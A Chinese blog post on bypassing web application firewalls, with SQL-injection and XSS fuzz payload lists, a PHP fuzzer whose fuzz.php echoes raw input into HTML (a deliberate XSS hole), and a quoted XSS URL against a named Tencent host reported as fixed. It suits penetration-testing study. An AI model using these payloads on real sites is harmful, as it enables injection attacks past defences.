WAF绕过的一些总结和思考

WAF分类:

1.网络层类

2.最常见且容易部署的应用层类 (部署在APACHE之前,APACHE之后)

应用层WAF – 利用WAF自身缺陷和MYSQL语法特性并结合实际绕过:

WAF最常见检测方式:关键词检测 例如 如果出现 [空格]union[空格] 这样的SQL语句则视为恶意请求,丢弃这个数据包,XSS代码同理。

常见的绕过类型:

类型1:

数据包 -> WAF(利用string存储请求参数,解码后检测)-> APACHE

C语言等利用string等储存结构存储请求,在解码时,%00会成为 NULL 从而截断接下去的请求内容

因此例如 ?id=1%00%20and%201=1 就成为了 ?id=1 从而绕过WAF检测

类型2:

数据包 -> WAF ->APACHE

绕过逻辑:

WAF对某些User-Agent特殊放行(如百度spider 的UA)

WAF对某些POST包特殊放行(文件上传包)

例子:《安全狗某版本bypass》(http://zone.wooyun.org/content/17331)

类型3:

数据包 -> WAF ->APACHE

利用mysql的语法特性和html代码的特殊书写方式、浏览器的渲染方式绕过。由于实际渗透测试过程中对WAF的实际检测逻辑并不清楚,所以利用fuzz是最好的方法,这也是WAF最常见的绕过方法。

FUZZ字典:

%a0union%a0 (WAF中正则表达式 \s 并不能匹配 %a0 但MYSQL视之为 空格)
%0aunion%0a
%0bunion%0b (WAF中正则表达式 \s \t 并不能识别匹配 %0b)
%09union%09
/**/union/**/
%0dunion%0d
/*%e4*/union/*%e4*/(UTF8中的半个中文 正则表达式中任意匹配符(.)不能匹配该内容)
`version`() (MYSQL语法特性 函数可以书写成 `函数名`())
/*!union*/
8E0union (MYSQL语法特性,检测为浮点数后语境结束,视为空格,下2同)
8.0union
\Nunion
.1union/*.1*/
...

MYSQL类的一个fuzz实例:《用htmlspecialchars()和htmlentities()处理字符串在数据库查询过程中真的安全吗?》(http://www.nohackair.net/167.shit)

XSS类的一个fuzz实例:

《Fuzz <img src=x [code]onerror=XSS>来检测 onerror 前可以无缝连接怎样的字符》

编写fuzzz.php 和 fuzz.php 代码如下

Fuzzz.php:

<html>
<?php
$urlhex=[‘0‘,‘1‘,‘2‘,‘3‘,‘4‘,‘5‘,‘6‘,‘7‘,‘8‘,‘9‘,‘a‘,‘b‘,‘c‘,‘d‘,‘e‘,‘f‘];
$i=0;
$ii=0;
for ($i=0; $i < 16 ; $i++) {
for ($ii=0; $ii < 16; $ii++) {
$hex = $urlhex[$i] . $urlhex[$ii];
$realhex = ‘%‘ .$urlhex[$i] . $urlhex[$ii];
echo "<iframe src=‘http://localhost/fuzz.php?c=".$realhex."&d=".$hex."‘‘></iframe>";

}
}
?>
</html>

Fuzz.php:

<?php
$code = $_GET[‘c‘];
$cc = $_GET[‘d‘];
?>
<html>
<img src=x <?php echo $code?>onerror="alert(‘<?php echo $cc?>‘)">
</html>

运行Fuzzz.php 进行自动fuzz,结果为:

0c,0d,2f,0a,20,09

同理可以fuzz出各种标签的其他位置可以插入的特殊字符。

附SQL语句空白符FUZZ结果 (http://zone.wooyun.org/content/15953)

SQLite3:0A,0D,0C,09,20
MySQL5:09,0A,0B,0C,0D,A0,20
PosgresSQL:0A,0D,0C,09,20
Oracle_11g:00,0A,0D,0C,09,20
MSSQL:01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20

类型4:

数据包 -> WAF ->APACHE

这是WAF无法考虑到的…

多次恶意代码检测和处理 留下的隐患:

例子(已修复):

漏洞名称:crm2.qq.com XSS

提交时间:2015-03-30 13:39:31

“这个时候就遇到了你们的迷之waf,<script>果断501啊,崩溃了半小时,稍微fuzz了一下,发现%0a会无视掉,成功bypass waf”

最后构造的XSS为:

http://crm2.qq.com/page/portalpage/wpa.php?uin=40012345&f=5&ty=6666&ap=%23&debug=1&bt=\x3csc%0aript\x3eale%0art()

这里有一个tencent waf ,对XSS代码也有一定的防御检测,在get请求中出现 <script> , alert() , <svg> 等关键词时,触发waf,返回错误码501

但由于参数在经过waf检测后,通过php的 $_GET[] 函数取得,并继续进行关键词过滤,经过笔者的一番fuzz,发现它会匹配换行符 %0a 并丢弃后输出,因此在这个逻辑下:

<scri%0apt>aler%0at()

经过waf 时,通过了检测(并没有关键词),然后经过php的字符串处理后,依然输出了恶意代码。

类型5:

数据包 -> WAF ->APACHE

畸形HTTP包,

利用Apache对HTTP包的兼容性和WAF对畸形HTTP包的不兼容性绕过WAF

总结:

对于普遍的应用层WAF,fuzz是测试waf的较好的方法,利用MYSQL的一些语法特性和浏览器的一些渲染方式,构造出一份强大的fuzz字典,或许就可以绕过waf的关键词检测。

同时,WAF和php代码的连接灵活性也是很值得考虑的,例如类型4,多次对传入数据进行处理反而容易留下隐患。

时间: 2024-10-13 09:45:09

WAF绕过的一些总结和思考的相关文章

waf绕过技巧

0x00 links waf绕过技巧库: http://wafbypass.me/w/index.php/Main_Page may be a best one https://xianzhi.aliyun.com/forum/attachment/big_size/wafbypass_sql.pdf good http://www.freebuf.com/articles/web/10099.html WAF绕过的奇技淫巧 http://tech-technical.com/index.php

web渗透测试中WAF绕过讲解(一)

---恢复内容开始--- 0x01 前言 许多Hacker总是生存在与WAF的不断抗争之中的,厂商不断过滤,Hacker不断的骚操作绕过.WAF与Hacker总是在斗智斗勇,经过长时间的发展,近年越来越多的Hacker投入到与WAF进行对抗,相对应的绕过方法也被大量的暴露出来,笔者今日就先进行个小小的科普先来说说WAF是什么. 0x02 什么是WAF? 简单的来说它是一个Web应用程序防火墙他的功能是执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品. 0x03 国

从偶然的机会发现一个mysql特性到wooyun waf绕过题

MayIKissYou | 2015-06-19 12:00 最近在测试的时候,偶然的机会发现了一个mysql的特性, 为啥是偶然的机会呢..... 一次测试的过程中我在mysql的console下做了如下的操作: 看出些什么了么? 我当时发现报错的时候例如-+{等符号 报错的时候提示的是''(双引号里没东西),但是如select后面添加1 a等内容的时候报的是 selecta,select1等等. 想到共性了么,-+{等等内容是能够直接添加到select后面的,知其那那个sql总结的帖子里有,

16. 再说 WAF 绕过

1,大小写混排 这可以算最容易想到的方式了.大小写绕过用于只针对小写或大写的关键字匹配技术,正则表达式 /express/i 大小写不敏感即无法绕过,这是最简单的绕过技术. 举例: z.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4 减少漏报方法:对每个关键字或每种情况都做大小写转换的处理. 2,替换关键字 这种情况下大小写转化无法绕过,而且正则表达式会替换或删除 select.union 这些关键字,如果只匹配一次就很容易绕过. 举例: z.com

基于HTTP协议的WAF绕过

一,畸形包绕过 1.先关闭burpsuite长度更新,为get请求,先使用bp的method转换为POST请求 2.get请求中空格使用%20代替,Connection改为keep-alive 二,分块传输绕过waf 1.先在数据包中添加Transfer-Encoding: chunked 2.数字代表下一列字符所占位数,结尾需要两个回车  三,协议覆盖waf绕过 1.首先将数据包转换为文件上传包格式,使用bp工具change body encoding 2.删除多余空格 3.添加参数filen

各种WAF绕过手法学习

原文:https://mp.weixin.qq.com/s/aeRi1lRnKcs_N2JLcZZ0Gg 0X00    Fuzz/爆破 fuzz字典 1.Seclists/Fuzzing https://github.com/danielmiessler/SecLists/tree/master/Fuzzing 2.Fuzz-DB/Attack https://github.com/fuzzdb-project/fuzzdb/tree/master/attack 3.Other Payload

web渗透测试中WAF绕过讲解(二)基于HTTP协议绕过

0x01 前言 在讲本课的内容之前我们先来了解互联网中的HTTP是什么?        超文本传输协议(HTTP,HyperText Transfer Protocol)是互联网上应用最为广泛的一种网络协议.所有的WWW文件都必须遵守这个标准.设计HTTP最初的目的是为了提供一种发布和接收HTML页面的方法.1960年美国人Ted Nelson构思了一种通过计算机处理文本信息的方法,并称之为超文本(hypertext),这成为了HTTP超文本传输协议标准架构的发展根基.Ted Nelson组织协

WAF绕过方法

1.大小写绕过 这个大家都很熟悉,对于一些太垃圾的WAF效果显著,比如拦截了union,那就使用Union UnIoN等等绕过. 2.简单编码绕过 比如WAF检测关键字,那么我们让他检测不到就可以了.比如检测union,那么我们就用%55也就是U的16进制编码来代替U,union写成 %55nION,结合大小写也可以绕过一些WAF,你可以随意替换一个或几个都可以. 也还有大家在Mysql注入中比如表名或是load文件的时候,会把文件名或是表明用16进制编码来绕过WAF都是属于这类. 3.注释绕过

SQL注入中的WAF绕过技术

1.大小写绕过 这个大家都很熟悉,对于一些太垃圾的WAF效果显著,比如拦截了union,那就使用Union UnIoN等等绕过. 2.简单编码绕过 比如WAF检测关键字,那么我们让他检测不到就可以了.比如检测union,那么我们就用%55也就是U的16进制编码来代替U,union写成 %55nION,结合大小写也可以绕过一些WAF,你可以随意替换一个或几个都可以. 也还有大家在Mysql注入中比如表名或是load文件的时候,会把文件名或是表明用16进制编码来绕过WAF都是属于这类. 3.注释绕过